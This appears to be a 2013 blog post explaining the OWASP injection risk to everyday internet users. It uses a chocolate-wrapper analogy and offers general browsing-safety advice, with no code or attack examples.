Tuesday, November 5, 2013

OWASP Top 10 For the Average Internet User: Injection

Where can it happen?

This can happen anywhere that a website allows users to enter text (Literally anywhere. Comment boxes, twitter updates, payment fields, username and password fields, etc, etc, etc) or anywhere that a website accepts text from the internet.

What is it?

A computer program is really just a series of letters and symbols put together by a person that a computer understands as instructions and then executes. When a computer program (like a website and your browser) handles text that you type, the distinction between the text and program is completely created by the computer. Think of it like a chocolate bar in a wrapper. The wrapper contains the chocolate bar and you can tell the difference, so you know to eat one and not the other.

But what if someone made a wrapper that looked and smelled like chocolate? You'd probably wind up with a mouthful of paper.

Injection is someone making the text they type into your website look and smell like program code so that the computer will run that code.

Why should I care?

Usually the program that is injected is SQL or javascript. Both of these are very bad. Javascript can make your browser do almost anything. The possibilities are only limited by the attackers imagination and the time they have to search for javascript tricks on the internet. If the attacker can find enough information about the website, they can make find a lot of information with SQL.

How do I protect myself?

Unfortunately this one is mostly on the people running the websites. The best thing you can do is to be careful what websites you visit. If someone sends you a link that doesn't look familiar, or you don't know why they're sending it to you find out more from them first.

You can also search for the name of the website on google. If you add "virus" or "malware" to the website's name, google should return some helpful results telling you if the website is known for suspicious activity.